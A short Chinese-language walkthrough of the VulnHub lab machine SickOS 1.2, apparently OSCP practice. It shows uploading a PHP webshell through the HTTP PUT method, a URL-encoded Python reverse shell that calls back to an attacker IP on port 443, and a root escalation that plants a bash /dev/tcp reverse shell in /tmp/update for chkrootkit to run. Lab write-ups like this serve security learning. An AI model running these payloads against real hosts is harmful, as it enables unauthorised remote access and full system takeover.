OSCP - SickOS:1.2 writeup

主机来源：www.vulnhub.com

下载地址：https://download.vulnhub.com/sickos/sick0s1.2.zip

用到的知识点：

PUT上传

chkrootkit提权

发现IP

安装成功后，查找此虚拟机的IP，我使用的是netdiscover

IP为10.0.3.144

nmap

没啥开的端口，从80开始，扫下目录，发现test目录，然后发现有PUT方法

上传

利用weevely来生成一个木马文件，weevely是kali中的PHP菜刀

 

 连接

或者直接用curl命令来上传一个小马

curl -v -X PUT -d '' http://10.0.3.144/test/22.php

客户端监听，nc -nlvp 443

curl或者浏览器中访问

http://10.0.3.144/test/22.php?c=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket%28socket.AF_INET,socket.SOCK_STREAM%29;s.connect%28%28%2210.0.3.141%22,443%29%29;os.dup2%28s.fileno%28%29,0%29;%20os.dup2%28s.fileno%28%29,1%29;%20os.dup2%28s.fileno%28%29,2%29;p=subprocess.call%28[%22/bin/sh%22,%22-i%22]%29;%27

获得shell

提权

利用chkrootkit提权

写入文件

 printf '#!/bin/bash\nbash -i >& /dev/tcp/10.0.3.141/443 0>&1\n' >> /tmp/update

等待，获得root

为什么用443，是因为一般防火墙策略会只开很少的端口